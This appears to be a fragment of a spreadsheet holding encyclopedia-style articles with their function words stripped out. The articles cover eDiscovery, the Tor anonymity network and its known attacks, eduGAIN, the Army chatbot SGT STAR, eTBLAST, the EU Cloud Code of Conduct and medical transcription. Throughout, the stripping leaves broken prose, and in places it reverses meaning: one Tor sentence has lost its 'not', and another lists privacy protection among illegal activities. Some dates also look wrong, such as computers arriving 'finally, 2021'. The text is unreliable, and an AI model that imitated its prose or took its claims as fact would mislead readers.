amounts data indexing across network servers attached network instances impossible impractical attend physical location custodian system storage devices attached custodian machines company servers) collection instance manually deployed. relation first approach several issues: typical collection process large volumes data transmitted across network indexing impacts normal business operations indexing process 100% reliable finding responsive material administrators generally unhappy installation agents custodian machines number concurrent custodian machines processed severely limited network bandwidth requirednew technology able address problems created first approach running application entirely memory custodian machine pushing responsive data across network. this process patented embodied tool subject conference paper.in relation second approach, despite self-collection topic ediscovery, concerns addressed limiting involvement custodian simply plugging device running application create encrypted container responsive documents. technology-assisted review technology-assisted review (tar)—also known computer-assisted review predictive coding—involves application supervised machine learning rule-based approaches infer relevance responsiveness, privilege, categories interest) esi. technology-assisted review evolved rapidly since inception circa 2005.following research studies indicating effectiveness, first recognized u.s. court 2012, irish court 2015, u.k. court 2016. recently u.s. court declared "black letter producing party wants utilize document review, courts permit it." subsequent matter, court stated, clear, court believes cases today, best efficient search tool. that particularly according research studies (cited tinto), methodology uses continuous active learning ("cal") eliminates issues seed stabilizing tool. court would liked city case. court cannot, not, force city there come time widely used might unreasonable party decline tar. yet. thus, despite court might want responding party sedona principle controls. hyles' application force city denied. convergence information governance anecdotal evidence emerging trend points business value information governance (ig), defined gartner "the specification decision rights accountability framework encourage desirable behavior valuation, creation, storage, use, archival, deletion information. includes processes, roles, standards, metrics ensure effective efficient information enabling organization achieve goals." compared ediscovery, information governance discipline rather new. traction convergence. ediscovery—as multibillion-dollar industry—is rapidly evolving, ready embrace optimized solutions strengthen cybersecurity (for cloud computing). since early 2000s ediscovery practitioners developed skills techniques applied information governance. organizations apply lessons learned ediscovery accelerate path forward sophisticated information governance framework. information governance reference model (igrm) illustrates relationship stakeholders information lifecycle highlights transparency required enable effective governance. notably, updated igrm v3.0 emphasizes privacy security officers essential stakeholders. this topic addressed article entitled "better ediscovery: unified governance igrm", published american association. also data mining data retention discovery (law) early case assessment electronically stored information (federal rules civil procedure) file hosting service forensic search information governance legal governance, risk management, compliance machine learning telecommunications data retention references external links federal judicial center: materials electronic discovery american association article ediscovery ediscovery (artificial intelligence)</t>
  </si>
  <si>
    <t>EgotisticalGiraffe</t>
  </si>
  <si>
    <t>tor, short onion router, free open-source software enabling anonymous communication. directs internet traffic free, worldwide, volunteer overlay network, consisting seven thousand relays, conceal user's location usage anyone performing network surveillance traffic analysis. using makes difficult trace user's internet activity. tor's intended protect personal privacy users, well freedom ability communicate confidentially address anonymity using exit nodes. history core principle tor, onion routing, developed mid-1990s united states naval research laboratory employees, mathematician paul syverson, computer scientists michael reed david goldschlag, protect american intelligence communications online. onion routing implemented means encryption application layer communication protocol stack, nested like layers onion. alpha version tor, developed syverson computer scientists roger dingledine nick mathewson called onion routing project (which later given acronym "tor"), launched september 2002. first public release occurred year later. 2004, naval research laboratory released code free license, electronic frontier foundation (eff) began funding dingledine mathewson continue development. 2006, dingledine, mathewson, five others founded project, massachusetts-based 501(c)(3) research-education nonprofit organization responsible maintaining tor. acted project's fiscal sponsor early years, early financial supporters included u.s. bureau democracy, human rights, labor international broadcasting bureau, internews, human rights watch, university cambridge, google, netherlands-based stichting nlnet. over course existence, various weaknesses discovered occasionally exploited. attacks active area academic research welcomed project itself. usage enables users surf internet, chat send instant messages anonymously, used wide variety people licit illicit purposes. has, example, used criminal enterprises, hacktivism groups, enforcement agencies cross purposes, sometimes simultaneously; likewise, agencies within u.s. government variously fund (the u.s. state department, national science foundation, broadcasting board governors, partially funded october 2012 radio free asia) seek subvert it.tor meant completely solve issue anonymity web. designed completely erase tracking instead reduce likelihood sites trace actions data back user.tor also used illegal activities. these include privacy protection censorship circumvention, well distribution child abuse content, drug sales, malware distribution.tor described economist, relation bitcoin silk road, dark corner web". targeted american national security agency british gchq signals intelligence agencies, albeit marginal success, successfully british national crime agency operation notarise. time, gchq using tool named "shadowcat" "end-to-end encrypted access using network". used anonymous defamation, unauthorized news leaks sensitive information, copyright infringement, distribution illegal sexual content, selling controlled substances, weapons, stolen credit card numbers, money laundering, bank fraud, credit card fraud, identity theft exchange counterfeit currency; black market utilizes infrastructure, least part, conjunction bitcoin. also used brick devices.in complaint ross william ulbricht silk road, federal bureau investigation acknowledged "known legitimate uses". according cnet, tor's anonymity function "endorsed electronic frontier foundation (eff) civil liberties groups method whistleblowers human rights workers communicate journalists". eff's surveillance self-defense guide includes description fits larger strategy protecting privacy anonymity.in 2014, eff's galperin told businessweek "tor's biggest problem press. hears time someone stalked abuser. they hear somebody away downloading child porn."the project states users include "normal people" wish keep internet activities private websites advertisers, people concerned cyber-spying, users evading censorship activists, journalists, military professionals. november 2013, four million users. according wall street journal, 2012 tor's traffic connected united states, people "internet-censoring countries" second-largest user base. increasingly used victims domestic violence social workers agencies assist them, even though shelter workers professional training cyber-security matters. properly deployed, however, precludes digital stalking, increased prevalence digital media contemporary online life. along securedrop, used news organizations guardian, yorker, propublica intercept protect privacy whistleblowers.in march 2015, parliamentary office science technology released briefing stated "there widespread agreement banning online anonymity systems altogether seen acceptable policy option u.k." "even were, would technical challenges." report noted "plays minor role online viewing distribution indecent images children" (due part inherent latency); usage internet watch foundation, utility onion services whistleblowers, circumvention great firewall china touted.tor's executive director, andrew lewman, also said august 2014 agents gchq anonymously provided reports.the project's offers supporting reasons eff's endorsement: criminals already things. since they're willing break laws, already lots options available provide better privacy provides... aims provide protection ordinary people want follow law. only criminals privacy right now, need that... yes, criminals could theory tor, already better options, seems unlikely taking away world stop things. time, privacy measures fight identity theft, physical crimes like stalking, operation aims conceal users' identities online activity surveillance traffic analysis separating identification routing. implementation onion routing, encrypts randomly bounces communications network relays volunteers around globe. these onion routers employ encryption multi-layered manner (hence onion metaphor) ensure perfect forward secrecy relays, thereby providing users anonymity network location. that anonymity extends hosting censorship-resistant content tor's anonymous onion service feature. furthermore, keeping entry relays (bridge relays) secret, users evade internet censorship relies upon blocking public relays.because address sender recipient cleartext along way, anyone eavesdropping point along communication channel cannot directly identify ends. furthermore, recipient, appears last node (called exit node), rather sender, originator communication. originating traffic user's socks-aware applications configured direct network traffic instance's socks interface, listening port 9050 (for standalone tor) 9150 (for browser bundle) localhost. periodically creates virtual circuits network multiplex onion-route traffic destination. once inside network, traffic sent router router along circuit, ultimately reaching exit node point cleartext packet available forwarded original destination. viewed destination, traffic appears originate exit node. tor's application independence sets apart anonymity networks: works transmission control protocol (tcp) stream level. applications whose traffic commonly anonymized using include internet relay chat (irc), instant messaging, world wide browsing. onion services also provide anonymity websites servers. servers configured receive inbound connections called onion services (formerly, hidden services). rather revealing server's address (and thus network location), onion service accessed onion address, usually browser. network understands addresses looking corresponding public keys introduction points distributed hash table within network. route data onion services, even hosted behind firewalls network address translators (nat), preserving anonymity parties. necessary access onion services.onion services first specified 2003 deployed network since 2004. other database stores onion service descriptors, decentralized design; direct readable list onion services, although number onion services catalog publicly known onion addresses.because onion services route traffic entirely network, connection onion service encrypted end-to-end subject eavesdropping. there are, however, security issues involving onion services. example, services reachable onion services public internet susceptible correlation attacks thus perfectly hidden. other pitfalls include misconfigured services (e.g. identifying information included default server error responses), uptime downtime statistics, intersection attacks, user error. open source onionscan program, written independent security researcher sarah jamie lewis, comprehensively examines onion services numerous flaws vulnerabilities. (lewis also pioneered field "onion dildonics", toys make ricochet protocol)onion services also accessed standard browser without client-side connection network, using services like tor2web. popular sources .onion links include pastebin, twitter, reddit, internet forums. status monitor (formerly arm) command-line status monitor written python tor. this functions much like system usage, providing real time statistics for: resource usage (bandwidth, cpu, memory usage) general relaying information (nickname, fingerprint, flags, or/dir/controlports) event optional regex filtering deduplication connections correlated tor's consensus data address, connection types, relay details, etc.) torrc configuration file syntax highlighting validationmost nyx's attributes configurable optional configuration file. runs platform supported curses including linux, macos, unix-like variants. project began summer 2009, since july 2010 official part project. free software, available general public license. weaknesses like current low-latency anonymity networks, cannot attempt protect monitoring traffic boundaries network (i.e., traffic entering exiting network). while provide protection traffic analysis, cannot prevent traffic confirmation (also called end-to-end correlation).a 2009 study revealed alternative network system jondonym (java anon proxy, jap) considered resilient website fingerprinting techniques tunneling protocols.the reason conventional single-hop protocols need reconstruct packet data nearly much multi-hop service like jondonym. website fingerprinting yielded greater accuracy identifying http packets conventional protocols versus yielded 2.96% accuracy. however, protocols like openssh openvpn required large amount data http packets identified.researchers university michigan developed network scanner allowing identification live "bridges" single scan. consensus blocking like many decentralized systems, relies consensus mechanism periodically update current operating parameters, network parameters like nodes good/bad relays, exits, guards, much traffic handle. tor's architecture deciding consensus relies small number directory authority nodes voting current network parameters. currently, directory authority nodes, health publicly monitored. addresses authority nodes hard coded client. authority nodes vote every hour update consensus, clients download recent consensus startup. network congestion attack, ddos, prevent consensus nodes communicating thus prevent voting update consensus. eavesdropping autonomous system (as) eavesdropping autonomous system (as), responsible routing packets least partly, present path segments client entry relay exit relay destination, statistically correlate traffic entry exit segments path (i.e. traffic confirmation) potentially infer destination client communicated. 2012, lastor proposed method predict potential ases segments avoid choosing path path selection algorithm client side. paper, also improve latency choosing shorter geographical paths client destination. exit node eavesdropping september 2007, egerstad, swedish security consultant, revealed intercepted usernames passwords email accounts operating monitoring exit nodes. cannot encrypt traffic exit node target server, exit node position capture traffic passing end-to-end encryption secure sockets layer (ssl) transport layer security (tls). while inherently breach anonymity source, traffic intercepted malicious exit nodes operators expose information source either payload protocol data. furthermore, egerstad circumspect possible subversion intelligence agencies: actually look nodes hosted are, nodes cost thousands dollars month host they're using lots bandwidth, they're heavy-duty servers would anonymous? october 2019, researcher revealed since least 2017, hundreds highly suspicious entry, relay, exit nodes, unknown group, unprecedented scale. alleged number servers could pose risk sybil attack could users' routes inside network, increasing risk deanonymization. point nodes running november 2021 purged. although described deanonymization attempt, motives achievements possibly on-going event still unknown. internal communication attack october 2011, research team esiea claimed discovered compromise network decrypting communication passing technique describe requires creating network nodes, controlling one-third them, acquiring encryption keys algorithm seeds. then, using known keys seeds, claim ability decrypt encryption layers three. they claim break third statistical attack. order redirect traffic nodes controlled, used denial-of-service attack. response claim published official blog stating rumors tor's compromise greatly exaggerated. traffic-analysis attack there methods traffic-analysis attack, passive active. passive traffic-analysis method, attacker extracts features traffic specific flow side network looks features side network. active traffic-analysis method, attacker alters timings packets flow according specific pattern looks pattern side network; therefore, attacker link flows side side network break anonymity shown that, although timing noise added packets, active traffic analysis methods robust noise.steven murdoch george danezis university cambridge presented article 2005 ieee symposium security privacy traffic-analysis techniques allow adversaries partial view network infer nodes used relay anonymous streams. these techniques greatly reduce anonymity provided tor. murdoch danezis also shown otherwise unrelated streams linked back initiator. this attack, however, fails reveal identity original user. murdoch working funded since 2006. exit node block operators internet sites ability prevent traffic exit nodes offer reduced functionality users. example, generally possible edit wikipedia using using address also used exit node. blocks addresses known exit nodes iplayer service, although non-exit relays bridges blocked. apple attack march 2011, researchers rocquencourt french institute research computer science automation (institut national recherche informatique automatique, inria), documented attack capable revealing addresses bittorrent users network. "bad apple attack" exploits tor's design takes advantage insecure application used associate simultaneous secure application address user question. method attack depends control exit node hijacking tracker responses, secondary attack method based part statistical exploitation distributed hash table tracking. according study:the results presented apple attack research paper based attack launched network authors study. attack targeted exit nodes, lasted twenty-three days, revealed total 10,000 addresses active users. this study significant first documented attack designed target file-sharing applications tor. bittorrent generate much traffic tor. furthermore, apple attack effective insecure application tor, bittorrent. some protocols exposing addresses researchers french institute research computer science automation (inria) showed dissimulation technique bittorrent bypassed attackers controlling exit node. study conducted monitoring exit nodes period twenty-three days. researches used three attack vectors: inspection bittorrent control messages tracker announces extension protocol handshakes optionally contain client address. analysis collected data revealed messages, respectively, contained addresses clients.: hijacking trackers' responses lack encryption authentication communication tracker peer, typical man-in-the-middle attacks allow attackers determine peer addresses even verify distribution content. such attacks work used tracker communication.: exploiting distributed hash tables (dht) this attack exploits fact distributed hash table (dht) connections impossible, attacker able reveal target's address looking even target uses connect peers.: with techniques, researchers able identify streams initiated users, whose addresses revealed. sniper attack jansen al.., describes ddos attack targeted node software, well defenses attack variants. attack works using colluding client server, filling queues exit node node runs memory, hence serve (genuine) clients. attacking significant proportion exit nodes way, attacker degrade network increase chance targets using nodes controlled attacker. heartbleed heartbleed openssl disrupted network several days april 2014 private keys renewed. project recommended relay operators onion service operators revoke generate fresh keys patching openssl, noted relays sets keys tor's multi-hop design minimizes impact exploiting single relay. five hundred eighty-six relays later found susceptible heartbleed taken offline precautionary measure. relay early traffic confirmation attack july 2014, project issued security advisory "relay early traffic confirmation attack" project discovered group relays tried de-anonymize onion service users operators. summary, attacking onion service directory node changed headers cells relayed tagging "relay" "relay early" cells differently encode additional information sent back requesting user/operator. user's/operator's guard/entry node also part attacking relays, attacking relays might able capture address user/operator along onion service information user/operator requesting. attacking relays stable enough designated "suitable hidden service directory" "suitable entry guard"; therefore, onion service users onion services might used relays guards hidden service directory nodes.the attacking nodes joined network early year january project removed july. although attack's beginning unclear, project implied february july, addresses onion service users operators might exposed.the project mentioned following mitigations besides removing attacking relays network: patched relay software prevent relays relaying cells "relay early" headers intended. planned update users' proxy software could inspect received "relay early" cells relays supposed to), along settings connect guard node instead selecting randomly reduce probability connecting attacking relay recommended onion services consider changing locations reminded users onion service operators could prevent de-anonymization attacker controlled could listen ends circuit, like attack.in november 2014 speculation aftermath operation onymous, resulting arrests internationally, weakness exploited. representative europol secretive method used, saying: "this something want keep ourselves. this, can't share whole world, want again." source cited "technical breakthrough" allowed tracking physical locations servers, initial number infiltrated sites exploit speculation. andrew lewman—a project representative—downplayed possibility, suggesting execution traditional police work likely.in november 2015 court documents matter addressed concerns security research ethics right unreasonably searched guaranteed fourth amendment. moreover, documents, along expert opinions, also show connection network attack enforcement operation including: search warrant administrator silkroad indicated january 2014 july, received information "university-based research institute" information "reliable addresses onion services sr2" identification least another seventeen black markets tor" "approximately addresses accessed vendor .onion address." addresses arrest administrator chronology nature attack fitted well operation senior researcher international computer science institute, part university california, berkeley, said interview institute worked "almost certainly" carnegie mellon university (cmu), concurred project's assessment earlier analysis edward felten, computer security professor princeton university, researchers cmu's cert/cc involvedin analysis published july, besides raising ethical issues, felten also questioned fulfillment cert/cc's purposes prevent attacks, inform implementers vulnerabilities, eventually inform public. because case, cert/cc's staff opposite carry large-scale long-lasting attack, withhold vulnerability information implementers, withhold information public. cert/cc non-profit, computer security research organization publicly funded federal government. mouse fingerprinting march 2016, security researcher based barcelona demonstrated laboratory techniques using time measurement javascript 1-millisecond level could potentially identify correlate user's unique mouse movements, provided user visited "fingerprinting" website browser regular browser. this proof concept exploits "time measurement javascript" issue, open ticket project months. circuit fingerprinting attack 2015, administrators agora, darknet market, announced taking site offline response recently discovered security vulnerability tor. they vulnerability was, wired speculated "circuit fingerprinting attack" presented usenix security conference. volume information study showed "anonymization solutions protect partially target selection lead efficient surveillance" typically hide volume information necessary target selection". implementations main implementation written primarily along python, javascript, several programming languages, consists 505,034 lines code 2019. browser browser flagship product project. created browser bundle steven murdoch announced january 2008. browser consists modified mozilla firefox browser, torbutton, torlauncher, noscript, https everywhere firefox extensions proxy. users browser removable media. operate microsoft windows, macos, android, linux, ios.a default search engine duckduckgo version 4.5, startpage.com default). browser automatically starts background processes routes traffic network. upon termination session browser deletes privacy-sensitive data http cookies browsing history. this effective reducing tracking canvas fingerprinting, also helps prevent creation filter bubble.to allow download places accessing project risky blocked, github repository maintained links releases hosted domains. firefox/tor browser attack 2011, dutch authority investigating child pornography discovered address onion service site called "pedoboard" unprotected administrator's account gave fbi, traced aaron mcgrath. after year surveillance, launched "operation torpedo" resulted mcgrath's arrest allowed install network investigative technique (nit) malware servers retrieving information users three onion service sites mcgrath controlled. technique, exploiting firefox/tor browser's vulnerability patched targeting users updated, flash application pinging user's address directly back server, resulted revealing least users well numerous users countries. mcgrath sentenced years prison early 2014, least users including former acting cyber security director sentenced subsequent cases.in august 2013 discovered firefox browsers many older versions browser bundle vulnerable javascript-deployed shellcode attack, noscript enabled default. attackers used vulnerability extract users' addresses windows computer names. news reports linked federal bureau investigation (fbi) operation targeting freedom hosting's owner, eric eoin marques, arrested provisional extradition warrant issued united states' court july. extradited marques ireland state maryland charges: distributing; conspiring distribute; advertising child pornography, well aiding abetting advertising child pornography. warrant alleged marques "the largest facilitator child porn planet". acknowledged attack september 2013 court filing dublin; technical details training presentation leaked edward snowden revealed code name exploit "egotisticalgiraffe". messenger october 2015, project released messenger beta, instant messaging program based instantbird built used default. like pidgin adium, messenger supports multiple different instant messaging protocols; however, accomplishes without relying libpurple, implementing chat protocols memory-safe language javascript instead.according lucian armasu toms hardware, april 2018, project shut messenger project three reasons: developers "instabird" [sic] discontinued support software, limited resources known metadata problems. messenger developers explained overcoming vulnerabilities discovered future would impossible project relying outdated software dependencies. phone 2016, developer mike perry announced prototype tor-enabled smartphone bases copperheados. meant direction mobile. project called 'mission improbable'. copperhead's lead developer daniel micah welcomed prototype. third-party applications vuze (formerly azureus) bittorrent client, bitmessage anonymous messaging system, torchat instant messenger include support. onionshare allows users share files using tor.the guardian project actively developing free open-source suite applications firmware android operating system improve security mobile communications. applications include chatsecure instant messaging client, orbot implementation, orweb (discontinued) privacy-enhanced mobile browser, orfox, mobile counterpart browser, proxymob firefox add-on, obscuracam.onion browser open-source, privacy-enhancing browser ios, uses tor. available store, source code available github.brave added support desktop browser's private-browsing mode. users switch tor-enabled browsing clicking hamburger menu right corner browser. security-focused operating systems several security-focused operating systems make made extensive tor. these include hardened linux from scratch, incognito, liberté linux, qubes subgraph, tails, tor-ramdisk, whonix. reception, impact, legislation praised providing privacy anonymity vulnerable internet users political activists fearing surveillance arrest, ordinary users seeking circumvent censorship, people threatened violence abuse stalkers. u.s. national security agency (nsa) called "the king high-secure, low-latency internet anonymity", businessweek magazine described "perhaps effective means defeating online surveillance efforts intelligence agencies around world". other media described sophisticated privacy tool", "easy use" secure even world's sophisticated electronic spies figured crack it".advocates supports freedom expression, including countries internet censored, protecting privacy anonymity users. mathematical underpinnings lead characterized acting "like piece infrastructure, governments naturally fall paying infrastructure want use".the project originally developed behalf u.s. intelligence community continues receive u.s. government funding, criticized "more resembl[ing] spook project tool designed culture values accountability transparency". 2012, project's annual budget came united states government, u.s. state department, broadcasting board governors, national science foundation major contributors, aiming democracy advocates authoritarian states". other public sources funding include darpa, u.s. naval research laboratory, government sweden. some proposed government values tor's commitment free speech, uses darknet gather intelligence. also receives funding ngos including human rights watch, private sponsors including reddit google. dingledine said united states department defense funds similar research grant procurement contract. executive director andrew lewman said even though accepts funds u.s. federal government, service collaborate reveal identities users.critics secure claims, pointing u.s. enforcement's investigations shutdowns tor-using sites web-hosting company freedom hosting online marketplace silk road. october 2013, analyzing documents leaked edward snowden, guardian reported repeatedly tried crack failed break core security, although success attacking computers individual users. guardian also published 2012 classified slide deck, entitled "tor stinks", said: never able de-anonymize users time", "with manual analysis de-anonymize small fraction users". when users arrested, typically human error, core technology hacked cracked. november 2014, example, joint operation fbi, homeland security investigations european enforcement agencies arrests seizure sites containing pages. late 2014 report spiegel using cache snowden leaks revealed, however, 2012 deemed "major threat" mission, used conjunction privacy tools otr, cspace, zrtp, redphone, tails, truecrypt ranked "catastrophic," leading "near-total loss/lack insight target communications, presence..." 2011 march 2011, project received free software foundation's 2010 award projects social benefit. citation read, "using free software, enabled roughly million people around world experience freedom access expression internet keeping control privacy anonymity. network proved pivotal dissident movements iran recently egypt." 2012 2012, foreign policy magazine named dingledine, mathewson, syverson among global thinkers "for making safe whistleblowers". 2013 2013, jacob appelbaum described "part ecosystem software helps people regain reclaim autonomy. helps enable people agency kinds; helps others help helps help yourself. runs, open supported large community spread across walks life."in june 2013, whistleblower edward snowden used send information prism washington post guardian. 2014 2014, russian government offered $111,000 contract "study possibility obtaining technical information users users' equipment anonymous network".in september 2014, response reports comcast discouraging customers using browser, comcast issued public statement policy tor, browser software."in october 2014, project hired public relations firm thomson communications improve public image (particularly regarding terms "dark net" "hidden services," widely viewed problematic) educate journalists technical aspects tor. 2015 june 2015, special rapporteur united nations' office high commissioner human rights specifically mentioned context debate u.s. allowing so-called backdoors encryption programs enforcement purposes interview washington post. july 2015, project announced alliance library freedom project establish exit nodes public libraries. pilot program, established middle relay running excess bandwidth afforded kilton library lebanon, hampshire, making first library u.s. host node, briefly hold local city manager deputy sheriff voiced concerns cost defending search warrants information passed exit node. although alerted hampshire authorities fact sometimes used criminals, lebanon deputy police chief deputy city manager averred pressure strong-arm library applied, service re-established september 2015. u.s. rep. lofgren (d-calif) released letter december 2015, asked clarify procedures, stating "while kilton public library's board ultimately voted restore relay, less disturbed possibility employees pressuring persuading public private entities discontinue degrade services protect privacy anonymity u.s. citizens." 2016 interview, kilton library manager chuck mcandrew stressed importance getting libraries involved tor: "librarians always cared deeply protecting privacy, intellectual freedom, access information (the freedom read). surveillance well-documented chilling effect intellectual freedom. librarians remove barriers information." second library host node naves public library valencia, spain, implemented first months 2016.in august 2015, security research group, called "x-force", quarterly report advised companies block security grounds, citing "steady increase" attacks exit nodes well botnet traffic.in september 2015, luke millanta created onionview, service plots location active relay nodes onto interactive world. project's purpose detail network's size escalating growth rate.in december 2015, daniel ellsberg pentagon papers), cory doctorow boing boing), edward snowden, artist-activist molly crabapple, amongst others, announced support tor. 2016 march 2016, hampshire state representative keith ammon introduced bill allowing public libraries privacy software. bill specifically referenced tor. text crafted extensive input alison macrina, director library freedom project. bill passed house 268–62.also march 2016, first node, specifically middle relay, established library canada, graduate resource centre (grc) faculty information media studies (fims) university western ontario. given running exit node unsettled area canadian law, general institutions capable individuals c</t>
  </si>
  <si>
    <t>EduGAIN</t>
  </si>
  <si>
    <t>edugain international interfederation service interconnecting research education identity federations. enables secure exchange information related identity, authentication authorization participating federations. service managed team terena. edugain® registered trademark dante. service description edugain service enables participating federations, primarily serve authentication authorisation interests research education sectors, interfederate. edugain provides infrastructure establishing trusted communications identity providers service providers different participating federations. end-users authenticate identity providers obtain access service providers. technically, edugain managed aggregating distributing signed saml metadata files. join edugain, parent organisation federation must sign edugain policy declaration submit terena secretariat attention edugain operations team. operations team deals daily technical issues edugain service provision, receives enquiries edugain forwards appropriate body, receives processes applications federations join service, prepares publishes federation operational practice statement edugain interfederation service, prepares audit plan edugain operational practices request edugain steering group. history edugain initiative started research activity project (2004-2009) co-funded european union, also provided funding géant network. edugain service activity started successor project (2009-2013), built upon edugain developed project, different. april 2011, edugain became operational service.in 2012, edugain service started reach beyond europe canadian brazilian federations joining service. year terena took leadership edugain service activity. from april 2013, funding service continued part gn3plus project. governance edugain steering group consists representative deputy representative federations participating service. steering group approves profiles documents edugain policy framework updates, decides peering relationships, approves participation federations, decides disqualification temporary suspension participating federations case violation policy framework, accepts amends plan audits edugain operations, appoints steering group chair non-voting invited observers steering group, appoints operational team. certain decisions steering group need ratified edugain executive committee, namely changes edugain policy framework constitution, adoption technical profiles documents policy framework exclude participating federations participation edugain service, approval major updates profiles documents edugain policy framework likely affect participating federation’s participation edugain service. role edugain executive committee entrusted executive board gn3plus project (april 2013 march 2015). geographical deployment thirty national research education federations officially admitted participants edugain. corresponding countries listed below, name federation parent organisation. europe asia-pacific north america latin america africa references external links official website</t>
  </si>
  <si>
    <t>SGT STAR</t>
  </si>
  <si>
    <t>star, also known sgt. star sergeant star, chatbot operated united states army answer questions recruitment. background after september attacks, traffic increased significantly chatrooms u.s. army's website, goarmy.com, increasing costs staffing live chatrooms. cost-cutting measure, star project initiated partnership united states army accessions command spectre wholly owned subsidiary next next spokane, washington-based company deploys "intelligent virtual assistants," using software dubbed "activeagent" framework functional presence engines. testing began 2003, star launched public 2006. "star" acronym "strong, trained ready." star launched chat interface goarmy.com, since developed mobile application, well life-size animated projection appeared live public events. star also interact users facebook. foia request 2013, electronic frontier foundation filed freedom information request learn star, including input output patterns (questions answers), usage statistics, contracts, privacy policies. they received records april 2014, coverage various media outlets tongue-in-cheek campaign "free sgt. star." references external links official website star answers obtained star usage statistics obtained</t>
  </si>
  <si>
    <t>ETBLAST</t>
  </si>
  <si>
    <t>etblast free text-similarity service defunct. initially developed alexander pertsemlidis harold “skip” garner 2015 university texas southwestern medical center. offered access following databases: medline national institutes health (nih) crisp institute physics (iop) wikipedia arxiv nasa technical reports virginia tech class descriptions others clinical interestetblast searched citation databases databases containing full-text pubmed. compared user’s natural-text query target databases utilizing hybrid-search algorithm. algorithm consisted low-sensitivity, weighted, keyword-based first pass followed novel second pass based sentence alignment. etblast later became web-based service innovation laboratory virginia bioinformatics institute. text-similarity engine studied duplicate publications potential plagiarism biomedical literature. etblast received thousands random samples medline abstracts large-scale study. those highest similarity assessed entered on-line database. work revealed several trends including increasing rate duplication biomedical literature, according prominent scientific journals bioinformatics,anaesthesia intensive care, clinical chemistry, urologic oncology, nature, science. also blast (basic local alignment search tool) natural language processing medical literature retrieval references external links official website</t>
  </si>
  <si>
    <t>EU Cloud Code of Conduct</t>
  </si>
  <si>
    <t>cloud code conduct (abbr. cloud coc" also known extended title data protection code conduct cloud service providers") transnational code conduct pursuant article european general data protection regulation (gdpr).the code defines clear requirements cloud service providers (csps) implement article gdpr related articles, covers processing activities every type personal data.encompassing cloud service layers (xaas, including iaas, paas, saas), code allows cloud service providers demonstrate gdpr compliance role processors, overseen accredited monitoring body, required article gdpr. history work code started 2012 former vice president european commission, neelie kroes, launched european cloud strategy. context, dedicated working group created task draft cloud code conduct data protection directive. primary goals drafting code increase trust amplify adoption cloud computing across european union. first draft produced working group submitted first assessment january 2015, performed article working party.with introduction gdpr, code adapted accordingly 2017, european commission fully handed project industry.still 2017, companies coming working group (alibaba cloud, fabasoft, ibm, oracle, salesforce sap) founded cloud general assembly assigned scope europe monitoring body secretariat.after several exchanges supervisory authorities related revisions, final version cloud submitted belgian data protection authority approval 2019. according timestamps code versions published initiative's website, code evolved submission approval 2021. such continued development codes conduct expected, following european data protection board's guidelines 1/2019 codes conduct monitoring bodies regulation 2016/679.the code approved belgian data protection authority 2021, following positive opinion issued european data protection board. scope structure code cloud allows csps prove demonstrate compliance within scope article gdpr related articles. therefore, cloud comprehends csps data protection obligations processing kind personal data requirements applicable cloud offerings (iaas, paas, saas), also known xaas.there five sections together compose core structure code, namely, scope, data protection, security requirements, monitoring compliance internal governance.besides main text, code accompanied controls catalogue, designed code’s requirements auditable elements, “controls”, corresponding gdpr provisions. additionally, controls catalogue also provides mapping relevant international standards (such 27001, 27017, c5). organizational structure organizational structure cloud covered internal governance section, describes rules procedures applied code’s management. referred section lays organizational framework code itself, well bodies, namely, general assembly, steering board, secretariat. dedicated monitoring body gdpr requires independent monitoring body guarantee appropriate implementation provisions. 2021, scope europe officially accredited belgian data protection authority dedicated monitoring body cloud coc.according gdpr, monitoring body shall responsible performing ongoing diligence. under cloud coc, besides subjected initial assessment become adherent code, csps reevaluated annual basis. additional assessments also triggered justified complaints, media reports, legislations, publications guidelines data protection authorities relevant development potentially affect adherence code. three levels compliance declaring adherence cloud coc. those levels relate solely type evidence subjected review monitoring body. nevertheless, levels demands compliance code’s requirements. membership supporters membership code open long agree approach principles established code. regard, cloud offers main membership options, first dedicated csps second covering entity wishes join initiative supporter. within membership umbrella, tailored pricing scheme place, takes consideration needs different company sizes allowing accessibility small medium enterprises (smes). today, cloud general assembly represents significant share european cloud industry market and, august 2021, membership encompasses alibaba cloud, alight, arcules, cisco, dropbox, epignosis, fabasoft, google cloud, ibm, gates, microsoft, okta, oracle, qompium (extra horizon), salesforce, sap, schellman, secureappbox, timelex, trustarc workday. third country transfer initiative following cjeu’s schrems ruling, cloud general assembly started work effective accessible safeguard third country transfers format on-top module code.the so-called third country transfer module shall cover legal requirements third country transfers outlined chapter gdpr and, on-top module standalone initiative implies prior compliance cloud pre-requisite. also cloud coc's website list adherent cloud services, including public reports monitoring body cloud references</t>
  </si>
  <si>
    <t>Medical transcription</t>
  </si>
  <si>
    <t>medical transcription, also known allied health profession dealing process transcribing voice-recorded medical reports dictated physicians, nurses healthcare practitioners. medical reports voice files, notes taken lecture, spoken material. these dictated phone uploaded digitally internet smart phone apps. history medical transcription currently known existed since beginning 20th century standardization medical records data became critical research. time, medical stenographers recorded medical information, taking doctors' dictation shorthand. with creation audio recording devices, became possible physicians transcribers work asynchronously.over years, transcription equipment changed manual typewriters, electric typewriters, word processors, finally, 2021, computers. storage methods also changed: plastic disks magnetic belts cassettes, endless loops, digital recordings. today, speech recognition (sr), also known continuous speech recognition (csr), increasingly used, medical transcriptions and, cases, "editors" providing supplemental editorial services. natural-language processing takes "automatic" transcription step further, providing interpretive function speech recognition alone provide. past, medical reports consisted abbreviated handwritten notes added patient's file interpretation primary physician responsible treatment. ultimately, handwritten notes typed reports consolidated single patient file physically stored along thousands patient records medical records department. whenever need arose review records specific patient, patient's file would retrieved filing cabinet delivered requesting physician. enhance manual process, many medical record documents produced duplicate triplicate means carbon copy. recent years, medical records changed considerably. although many physicians hospitals still maintain paper records, majority stored electronic records. this digital format allows immediate remote access physician authorized review patient information. reports stored electronically printed selectively need arises. many healthcare providers today work using handheld personal data assistants (pdas) utilizing software record dictation. overview medical transcription part healthcare industry renders edits doctor dictated reports, procedures, notes electronic format order create files representing treatment history patients. health practitioners dictate done performing procedures patients, transcribe oral dictation, edit reports gone speech recognition software, both.pertinent, up-to-date confidential patient information converted written text document medical transcriptionist (mt). this text printed placed patient's record, retained electronic format, placed patient's record also retained electronic format. medical transcription performed employees hospital work home telecommuting employees hospital; working telecommuting employees independent contractors outsourced service performs work offsite contract hospital, clinic, physician group healthcare provider; working directly providers service (doctors group practices) either onsite telecommuting employees contractors. hospital facilities often prefer electronic storage medical records sheer volume hospital patients accompanying paperwork. electronic storage database gives immediate access subsequent departments providers regarding patient's care date, notation previous present medications, notification allergies, establishes history patient facilitate healthcare delivery regardless geographical distance location. term transcript, "report" used refer healthcare professional's specific encounter patient. this report also referred many "medical record". each specific transcribed record report, specific date service, merged becomes part larger patient record 